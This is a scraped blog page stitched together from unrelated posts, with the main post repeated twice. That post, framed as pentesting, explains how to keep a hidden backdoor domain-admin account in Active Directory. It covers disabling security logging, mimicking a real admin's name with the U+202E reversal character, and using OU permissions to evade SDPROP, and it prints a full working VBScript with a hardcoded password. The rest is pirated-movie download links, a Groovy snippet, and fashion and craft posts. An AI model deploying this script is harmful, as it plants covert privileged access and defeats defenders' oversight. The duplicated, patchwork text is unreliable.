Showing posts with label a. Show all posts
Showing posts with label a. Show all posts
Thursday, March 30, 2017
A Backdoor in the Next Generation Active Directory
A Backdoor in the Next Generation Active Directory
At the beginning of the last year, I already raised the issue of post-exploitation in a Microsoft Active Directory domain. The brought forward approach addressed the variant aimed mostly at the case of the loss of admin privileges rather than their exploitation. Additionally, the action of regaining the privileges itself involved conspicuous events and visually evident manipulations in the directory. In other words, to regain admin privileges one had to become a member of the appropriate security group, such as Domain Admins.
It should be mentioned that administrators get very nervous when suddenly they realize there is someone else in the system. Some of them rush to address the security incident horse and foot, sometimes taking most unpredictable steps;))

Now imagine how an Active Directory administrator of a large company can react when they see an unfamiliar account name in the Enterprise Admins security group. In case someone really intruded the system, the administrators concern is perfectly reasonable. However, in cases of improper counteraction when a pentest is taking place, it is certainly not worth worrying about (along with depriving the pentest guys of their access points and privileges gained with blood and sweat).
I spent a lot of time thinking on how, without scaring administrators, to use the privileges gained during pentest freely (especially with aggressive counteraction of administrators, as it was during my recent pentests). On the one hand, pentesters are strictly limited in their possibilities. For example, the rule of minimizing impact on the object is taken for granted. So, we cannot simply create and leave backdoors all around the network. On the other hand, there are absolutely clear goals that should be achieved before a happy administrator notices unauthorized activity and unplugs the computer.
So how can a pentester remain unnoticed in Microsoft networks?
The first thing that comes to my mind is to use an admin account. The access is legitimate, so it should not attract any special attention. However, as experience has shown, obtaining clear-text admin password is not always possible. In such cases the attack called Pass-the-Hash comes to your aid. It would be almost perfectly ok (almost, since the Pass-the-Hash type of attack narrows the possibilities of developing the attack, e.g. the RDP remote access protocol cannot be used), but in serious companies administrators gradually turn to smart cards, which do not allow conducting attacks based on the NTLM protocol faults. Ok, we still can exploit an authorized users token (e.g., incognito) and/or a Kerberos ticket (e.g., WCE). Thats as it may be, of course, but in practice Kerberos is not Kerberos and a token is not a token: available tools for conducting such types of attacks, unfortunately, are definitely lousy. Moreover, in both cases (just as in case of Pass-the-Hash), the attackers are rather limited in their actions by the protocols in use that support domain SSO.
So, the most attractive way is to exploit the privileges of, if not an existing domain admin account, then a created one with a known password...
How, while doing this, not to be spotted by an attentive eye of the domain administrator?
First, adding changes to Active Directory involves generation of certain events, about which administrators had better not know. So, before intruding a domain (of course, only as part of a pentest and only with an approval of your customers representative) disable logging of security events on the domain controllers by using an appropriate GPO. Let me remind you that by default the time of group policies background refresh on domain controllers is 15 minutes.
Second, why not to create a visually identical account that is analogous to the existing domain admin account? To achieve it, you can, for example, use Unicode symbols (!). Then, you can set the newly created users attribute showInAdvancedViewOnly to TRUE, which will allow you to hide the object in the default view mode of the Manage users and computers (dsa.msc) snap-in. After that, there is one remaining step: to assign the account to an administrative group which is free from a real domain admin (as a rule, administrators just cant help assigning their accounts to all thinkable and unthinkable administrative groups), for instance, lets leave the admin account in the Enterprise Admins group, and put its clone into the Domain Admins group.
However, I suppose many readers are already in doubt that the campaign can be successful. And they are right! This technique is good for nothing, since it has two significant defects:
1. The created account is visible in the directory to an aided eye.
2. When searching for users in the domain, the admin account appears double.
What are the solutions to these problems?
It would seem that the simplest solution is obvious: to set the permissions on the newly created object (our account) appropriately. It is sufficient to forbid the Everyone group to read public information about the object. And in the organization unit, next to the real Active Directory admin, something will appear, and this something will cease to let itself be noticed in the output of domain accounts search. However, this dolce vita will last not more than 60 minutes. The thing is that by default every 60 minutes the SDPROP process runs on the domain controller which acts as a PDC emulator. The process restores access rights of some Active Directory objects (including all members of administrative groups) according to the defined permissions on the AdminSDHolder object (http://technet.microsoft.com/en-us/query/ee361593).
Unfortunately, it is impossible to disable the security mechanism by using standard functionality. A hacking attempt via exploiting permissions on the object may cause replication problems (here it starts to smell of sort of sabotage, which is inadmissible when pentesting). Changing ACLs on the AdminSDHolder object will affect many objects, including all domain admins accounts. So, as a possible feasible solution you may want to use regular running of a script which redresses the consequences of the SDPROP process actions. However, there is even a better alternative.
The SDPROP process restores ACE for specific privileged objects only, but ACEs of organization units that contain such objects remain unchanged. That is just the thing for exploitation! Using Unicode symbols you can freely create organizational units sequence analogous to the one that contains the clone account. "Correct" permissions on the parent container allow hiding it from the sharp eye of administrators (within reasonable limits, of course).


The idea of this approach is that Active Directory administrators should not develop alarming suspicions that the systems entrusted to them are compromised. They still remain valid administrators, however there is a privileged group member account which is visually identical to the AD admin account...
And one more thing. In order to avoid appearing of the doubles of the accounts when searching in the directory, you can use, for instance, the 202E symbol (my thanks to Alexander Zaitsev for reminding me this). The symbol turns over the string that follows it. So, if you create, for example, a clone for the dmitry.ivanov account, the newly created account name will look like 202E+vonavi.yrtimd. Perhaps this approach is not very convenient for authenticating in the system, but it helps avoid appearing in the search input.

In the aspect of security event logs, the approach also allows you to remain unnoticed for a certain period of time.

The script that automatically performs all the covered steps is available below. It includes the following customizable parameters:
strAdminsamAccountName is the account name that should be cloned,
strAdminsGroup is the privileged group to which the clone should be assigned,
strPassNewUser is the password that should be set for the newly created account.
On Error Resume Next
strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "P@ssw0rd"
- - -
Dim arrContainer(), i
Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)
strAdminsamAccountNameDN = SearchDN(" WHERE objectCategory=user AND samAccountName = " & strAdminsamAccountName & "")
If Not IsNull(strAdminsamAccountNameDN) Then
Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)
i=0
Call EnumOUs(objOU)
For j = i-1 To 0 Step -1
if strContainer="" Then
strContainer = "OU=" & arrContainer(j) & strContainer
primaryContainer = strContainer
Else
strContainer = "OU=" & arrContainer(j) & "," & strContainer
End if
Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
objOUcreate.SetInfo
Next
Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.SetPassword strPassNewUser
objUserCreate.Put "userAccountControl", 66048
objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
On Error Resume Next
NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
strAdminsGroupDN = SearchDN(" WHERE objectCategory=group AND samAccountName = " & strAdminsGroup & "")
If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, "member", Array(NewUserDN)
objGroup.SetInfo
End If
OUAddAce(primaryContainer & "," & strDomain)
End If
Function SearchDN(str)
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
Set objCommand.ActiveConnection = objConnection
objCommand.Properties("Searchscope") = 2
objCommand.CommandText = "SELECT distinguishedName FROM LDAP://" & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields("distinguishedName").Value
End if
End Function
Sub EnumOUs(objChild)
Dim objParent
Set objParent = GetObject(objChild.Parent)
If (objParent.Class = "organizationalUnit") Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub
Function OUAddAce(OU)
Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject ("LDAP://" & OU)
Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")
objAce.Trustee = "Everyone"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
objDacl.AddAce objAce
objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo
Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo
End Function
It should be mentioned that administrators get very nervous when suddenly they realize there is someone else in the system. Some of them rush to address the security incident horse and foot, sometimes taking most unpredictable steps;))

Now imagine how an Active Directory administrator of a large company can react when they see an unfamiliar account name in the Enterprise Admins security group. In case someone really intruded the system, the administrators concern is perfectly reasonable. However, in cases of improper counteraction when a pentest is taking place, it is certainly not worth worrying about (along with depriving the pentest guys of their access points and privileges gained with blood and sweat).
I spent a lot of time thinking on how, without scaring administrators, to use the privileges gained during pentest freely (especially with aggressive counteraction of administrators, as it was during my recent pentests). On the one hand, pentesters are strictly limited in their possibilities. For example, the rule of minimizing impact on the object is taken for granted. So, we cannot simply create and leave backdoors all around the network. On the other hand, there are absolutely clear goals that should be achieved before a happy administrator notices unauthorized activity and unplugs the computer.
So how can a pentester remain unnoticed in Microsoft networks?
The first thing that comes to my mind is to use an admin account. The access is legitimate, so it should not attract any special attention. However, as experience has shown, obtaining clear-text admin password is not always possible. In such cases the attack called Pass-the-Hash comes to your aid. It would be almost perfectly ok (almost, since the Pass-the-Hash type of attack narrows the possibilities of developing the attack, e.g. the RDP remote access protocol cannot be used), but in serious companies administrators gradually turn to smart cards, which do not allow conducting attacks based on the NTLM protocol faults. Ok, we still can exploit an authorized users token (e.g., incognito) and/or a Kerberos ticket (e.g., WCE). Thats as it may be, of course, but in practice Kerberos is not Kerberos and a token is not a token: available tools for conducting such types of attacks, unfortunately, are definitely lousy. Moreover, in both cases (just as in case of Pass-the-Hash), the attackers are rather limited in their actions by the protocols in use that support domain SSO.
So, the most attractive way is to exploit the privileges of, if not an existing domain admin account, then a created one with a known password...
How, while doing this, not to be spotted by an attentive eye of the domain administrator?
First, adding changes to Active Directory involves generation of certain events, about which administrators had better not know. So, before intruding a domain (of course, only as part of a pentest and only with an approval of your customers representative) disable logging of security events on the domain controllers by using an appropriate GPO. Let me remind you that by default the time of group policies background refresh on domain controllers is 15 minutes.
Second, why not to create a visually identical account that is analogous to the existing domain admin account? To achieve it, you can, for example, use Unicode symbols (!). Then, you can set the newly created users attribute showInAdvancedViewOnly to TRUE, which will allow you to hide the object in the default view mode of the Manage users and computers (dsa.msc) snap-in. After that, there is one remaining step: to assign the account to an administrative group which is free from a real domain admin (as a rule, administrators just cant help assigning their accounts to all thinkable and unthinkable administrative groups), for instance, lets leave the admin account in the Enterprise Admins group, and put its clone into the Domain Admins group.
However, I suppose many readers are already in doubt that the campaign can be successful. And they are right! This technique is good for nothing, since it has two significant defects:
1. The created account is visible in the directory to an aided eye.
2. When searching for users in the domain, the admin account appears double.
What are the solutions to these problems?
It would seem that the simplest solution is obvious: to set the permissions on the newly created object (our account) appropriately. It is sufficient to forbid the Everyone group to read public information about the object. And in the organization unit, next to the real Active Directory admin, something will appear, and this something will cease to let itself be noticed in the output of domain accounts search. However, this dolce vita will last not more than 60 minutes. The thing is that by default every 60 minutes the SDPROP process runs on the domain controller which acts as a PDC emulator. The process restores access rights of some Active Directory objects (including all members of administrative groups) according to the defined permissions on the AdminSDHolder object (http://technet.microsoft.com/en-us/query/ee361593).
Unfortunately, it is impossible to disable the security mechanism by using standard functionality. A hacking attempt via exploiting permissions on the object may cause replication problems (here it starts to smell of sort of sabotage, which is inadmissible when pentesting). Changing ACLs on the AdminSDHolder object will affect many objects, including all domain admins accounts. So, as a possible feasible solution you may want to use regular running of a script which redresses the consequences of the SDPROP process actions. However, there is even a better alternative.
The SDPROP process restores ACE for specific privileged objects only, but ACEs of organization units that contain such objects remain unchanged. That is just the thing for exploitation! Using Unicode symbols you can freely create organizational units sequence analogous to the one that contains the clone account. "Correct" permissions on the parent container allow hiding it from the sharp eye of administrators (within reasonable limits, of course).


The idea of this approach is that Active Directory administrators should not develop alarming suspicions that the systems entrusted to them are compromised. They still remain valid administrators, however there is a privileged group member account which is visually identical to the AD admin account...
And one more thing. In order to avoid appearing of the doubles of the accounts when searching in the directory, you can use, for instance, the 202E symbol (my thanks to Alexander Zaitsev for reminding me this). The symbol turns over the string that follows it. So, if you create, for example, a clone for the dmitry.ivanov account, the newly created account name will look like 202E+vonavi.yrtimd. Perhaps this approach is not very convenient for authenticating in the system, but it helps avoid appearing in the search input.

In the aspect of security event logs, the approach also allows you to remain unnoticed for a certain period of time.

The script that automatically performs all the covered steps is available below. It includes the following customizable parameters:
strAdminsamAccountName is the account name that should be cloned,
strAdminsGroup is the privileged group to which the clone should be assigned,
strPassNewUser is the password that should be set for the newly created account.
On Error Resume Next
strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "P@ssw0rd"
- - -
Dim arrContainer(), i
Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)
strAdminsamAccountNameDN = SearchDN(" WHERE objectCategory=user AND samAccountName = " & strAdminsamAccountName & "")
If Not IsNull(strAdminsamAccountNameDN) Then
Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)
i=0
Call EnumOUs(objOU)
For j = i-1 To 0 Step -1
if strContainer="" Then
strContainer = "OU=" & arrContainer(j) & strContainer
primaryContainer = strContainer
Else
strContainer = "OU=" & arrContainer(j) & "," & strContainer
End if
Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
objOUcreate.SetInfo
Next
Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.SetPassword strPassNewUser
objUserCreate.Put "userAccountControl", 66048
objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
On Error Resume Next
NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
strAdminsGroupDN = SearchDN(" WHERE objectCategory=group AND samAccountName = " & strAdminsGroup & "")
If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, "member", Array(NewUserDN)
objGroup.SetInfo
End If
OUAddAce(primaryContainer & "," & strDomain)
End If
Function SearchDN(str)
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
Set objCommand.ActiveConnection = objConnection
objCommand.Properties("Searchscope") = 2
objCommand.CommandText = "SELECT distinguishedName FROM LDAP://" & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields("distinguishedName").Value
End if
End Function
Sub EnumOUs(objChild)
Dim objParent
Set objParent = GetObject(objChild.Parent)
If (objParent.Class = "organizationalUnit") Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub
Function OUAddAce(OU)
Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject ("LDAP://" & OU)
Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")
objAce.Trustee = "Everyone"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
objDacl.AddAce objAce
objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo
Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo
End Function
Available link for download
A Darker Fifty Shades The Fetish Set 2015 DVDRip Full Movie Watch Online Free
A Darker Fifty Shades The Fetish Set 2015 DVDRip Full Movie Watch Online Free

A Darker Fifty Shades: The Fetish Set (2015



Available link for download
Wednesday, March 29, 2017
A Flying Jatt 2016 New Bollywood Free Download Full HD Movie Watch Online
A Flying Jatt 2016 New Bollywood Free Download Full HD Movie Watch Online

From Wikipedia,
A Flying Jatt is a upcoming Bollywood superhero film directed by Remo DSouza starring Tiger Shroff, Jacqueline Fernandez and professional wrestler Nathan Jones in lead roles. Shroff is playing the role of a superhero and Fernandez will be playing his love interest in the film. The film is slated for release on 25 August 2016.
Directed by Remo DSouza Produced by Ekta Kapoor
Shobha KapoorWritten by Mayur Puri
(Dialogue)Screenplay by Tushar Hiranandani Story by Remo DSouza Starring
Tiger Shroff
Nathan Jones
Jacqueline FernandezMusic by Sachin-Jigar Cinematography Vijay Arora Edited by Nitin FCP Production
company Balaji Motion PicturesDistributed by ALT Entertaiment Release dates
25 August 2016Country India Language Hindi
||Movie Screenshots||




||Watch Latest Movie Trailers n Previews||

||Free Watch Full HD Movie Online||
Click Here |
||Free Download Movie Via Resumable Splitted 80MB Parts||
Swankshare Parts | Sharebeast Parts |
Sendmyway Parts | Uploadbaz Parts |
Fileswap Parts | Filedap Parts |
Upafile Parts | Hipfile Parts |
Uppit Parts | clickupload Parts |
OpenLoad Parts | Uptobox Parts |
Usercloud Parts | Zippyshare Parts |
||Free Download Movie Via Single Resumable 399MB||

|| Password : www.bestfreedownload.net ||
Available link for download
A Groovy switch case example
A Groovy switch case example
Below is an example of Groovys switch/case feature taken from The Definitive Guide to Grails by Graeme Rocher. I am not a regular user of Javas switch/case feature, but if it had been this way perhaps I might have.
switch (x) {
case James:
println "yes it is me"
break
case 18..65:
println "ok you are old"
break
case ~/Gw?+e/:
println "your name starts with G and ends in e!"
break
case Date:
println got a Date instance
break
case [John, Ringo, Paul, George]:
println "Got one of the Beatles"
break
default:
println "Dont know"
}
Available link for download
A Declaration of Love for My Favorite Leafy Green Vegetable
A Declaration of Love for My Favorite Leafy Green Vegetable









Ill cherish these last few days of "kale sweatshirt" weather-- I have a feeling itll be over pretty soon.
xo,
e.m.
sweatshirt/ T-me, polo/ Fred Perry, blazer/ ASOS (similar), jeans/ Urban Outfitters, shoes/ Doc Martens, bag/ Chloé, watch/ Michael Kors, hat/ GAP, lipstick/ Lolita by Kat Von D
***Photos by Danielle Conyers. Follow her on Instagram!
Available link for download
A Black and White Halloween
A Black and White Halloween
I love Halloween. Seriously love it. I think my favorite part about it is all the fun decor. This year I thought it would be cool to decorate our living and dining room in black and white. Kind of spooky yet classy at the same time.

I used my Cricut Expression and the Mini Monsters cartridge to cut out these fun shapes for our white frames.

For our dining table, we used a ton of black candle holders, taper candles, faux crows and white pumpkins.

And of course, we had to have some little ghosties flying around.

Halloween has been on my mind so much lately, and weve done so much to prepare that I cant believe its still 2 1/2 weeks away!

Available link for download
a day in the life thrifting styling and photo editing
a day in the life thrifting styling and photo editing
What you choose to do with your precious days off really reflect the person you are, dont they? Yesterday, I went out thrifting. There is nothing like poking around in a dusty shop full of vintage loveliness to make my heart sing! I havent been out in ages, and I found a bunch of small things for the house as well as some pieces for a friend who is moving and needs a bit of staging done prior to listing her home.
Our bedroom is in flux mode right now - on the weekend we moved our bed frame to the guest room, because I am going to make a new upholstered version - pics will follow :) Im planning a to incorperate "dressing cabinet", to store and display my favourite accessories, and so need a few bits for jewelry display. Enter this charming little tiered - tray brass and laquer number - perfect for the jewelry Im wearing everyday. As you can see, its already settled into its new home...


I bought it, brought it home, and immediately cleaned it, styled up this little display and took photos!
Please tell me Im not the only one :) x am
Available link for download
2Bekini a Courmayeur
2Bekini a Courmayeur
![]() |
Per lo scorso ponte dell8 dicembre, con il mio fidanzato abbiamo deciso di trascorrere qualche giorno in montagna ... La scelta è ricaduta su Courmayeur ... Non ceravamo mai stati. Bellissima località montana, cittadina splendida ... Pulita, si mangia bene, tutti molto cordiali, parecchio movimento, panorami mozzafiato ... parecchio cara rispetto ad altre località turistiche, ma allora non sarebbe Courmayeur ... Per loccasione non potevo non portare con me anche linseparabile 2bekini perché "in costume sempre" è uno stile di vita ... Prontissima per scendere alla Spa dellhotel, vi presento il mio 2Bekini in formula Mix & Match ... |
Available link for download
Labels:
2bekini,
a,
courmayeur
Tuesday, March 28, 2017
A Little Behind The Scenes Moment
A Little Behind The Scenes Moment
This is from the episode "The Candidate."


In fact it was so wet and muddy here that when I grabbed onto this fallen tree, the wood crumbled in my hands.

Available link for download
A Casual Cool Way To Wear Velvet
A Casual Cool Way To Wear Velvet

Photo via: Anines World
This look from Anine Bing shows us how to pull off a velvet bag and velvet pumps in a casual cool way. Most reserve the luxe fabric for dressier occasions, but you can just as easily wear it with a striped tee and jeans for a more low-key outfit as we see here.
Get the look:
+ Quay Harper Sunglasses
+ La Vie Rebecca Taylor Stripe Top
+ KC Jagger Porter Velvet Crossbody
+ See By Chloé Dip-Dyed Jeans
+ London Rebel Velvet Court Shoe
Available link for download
A Flying Fighter 2016 Full Hindi Dubbed Movie Ravie Teja Action Movi
A Flying Fighter 2016 Full Hindi Dubbed Movie Ravie Teja Action Movi
Chanti (Ravi Teja) respects his uncle Rama Krishna (Ghattamaneni Sivarama Krishna) more than his father Purshrotam (Chandra Mohan). Rama Krishna has enmity with Umapathi (Pradeep Rawat) because of something that happened 20 years ago. Later, Chanti is kicked out of their house because of some misunderstandings and now Umapathi is ready to put Rama Krishna down. How Chanti secretly helps Rama Krishna in bringing the enemy down and reunites with his family forms the rest of the story.
Available link for download
2010 Graduates How to Become a Millionaire
2010 Graduates How to Become a Millionaire
2010 Graduates: How to Become a Millionaire
Available link for download
Monday, March 27, 2017
A French Girl Approved Way to Style Outerwear
A French Girl Approved Way to Style Outerwear

Photo via: Sandra Semburg
Achieve the french girl-approved look by pairing tonal colors together. This editor wore a gray coat, gray scarf and darker hued gray t-shirt with white jeans and black accessories. The matching colors bring this look together and give off sophisticated and classic vibes.
Get the look:
+ Tory Burch Round Aviator Sunglasses
+ Splendid Drapey Luxe Top
+ Cupcakes and Cashmere Levin Duster Coat
+ Paige Hoxton Ankle Skinny Jeans
+ Alexander Wang Trista Pumps
Available link for download
A great infosec quote
A great infosec quote
The late (and great) Jim Rohn once said:
If you really want to do something, youll find a way. If you dont, youll find an excuse.
Oh my...so many information security tie-ins.
Available link for download
Sunday, March 26, 2017
A Herd of Snugglesauruses
A Herd of Snugglesauruses
I recently made some new dinos for the shop! They are similar to an item I used to make, but these are even better... they have an improved design, stand up by themselves, and have two rows of adorable ruffles down their back! Just the right size for babies, and super cute too! There are seven different fabrics I used for the ruffles, here is a sampling:
And here is the whole herd lined up for a group photo:
Fun stuff :)
Available link for download
Labels:
a,
herd,
of,
snugglesauruses
Saturday, March 25, 2017
A Casual Chic Take On The Burgundy Sweater
A Casual Chic Take On The Burgundy Sweater

Photos via: @sabinasocol
We recently came across this casual chic look from LOfficiel Paris social editor Sabina Socol and just had to share. She shows us an effortless, comfy and super stylish way to wear an oversized burgundy sweater with the help of vintage raw-hem jeans and matching burgundy ankle-strap heels.
Get the look:
+ Subtle Luxury Life Double V Sweater
+ Trouvé Asymmetrical Sweater
+ DL1961 Patti Crop Straight Leg Jeans
+ Chloe Ankle Wrap Ballerina Pump
+ Sarah Jessica Parker Ingenue Pumps
Available link for download
A leafy stampy stencilly bloggy offer
A leafy stampy stencilly bloggy offer
Hi there.
Thanks for popping in.
The sun is pouring through the windows here.
Absolutely glorious.
And the colours of the leaves on the trees!
I think this is my favourite time of year.
How about you?
We have a very old ginkgo tree in our back garden.
It is the last tree to get its dainty green dress on in the springtime;

then at this time of year - almost overnight -
its bright green coat turns a light yellow,

and then drops to the ground, like a soft carpet.
Then you see its ancient, twisted branches, all naked and delicate.
A wonderful thing.
And how lucky are we to see this seasonal ritual
right outside our kitchen window!
On the subject of leaves, we have a collection of
four little stamp & stencil sets, which are very cool.
Perfect for ANY time of year.
And if you just invested in the little Petite Printing Plates,
these will be a superb addition.
How about a little bloggy offer?
Below you will find not one but four little stamp & stencil sets,
designed by our lovely Mel. The large stamp sits beautifully inside its respective stencil, but of course, each can be used independently.
1.

LEAF 1 click here
![]() |
Lynne Hammond |
![]() |
Paul Church |
2.

LEAF 2 click here
![]() |
Lynne Hammond |
![]() |
Linda Spencer |
3

LEAF 3 click here
![]() |
Emma Williams |

4.

LEAF 4 click here
![]() |
Emma Williams |
Yeah.
Lets celebrate the end of the Clarity show season,
and the changing of the season with all its beautiful, fantastic autumnal colours, which so define our little island here,
with a half price sale on these 4 stamp/stencil sets.
Offer ends midnight Sunday.
I think Ill do some artwork with these this week;
I fancy that...
Love & best wishes,
Barb
xxxx
Available link for download
Subscribe to:
Posts (Atom)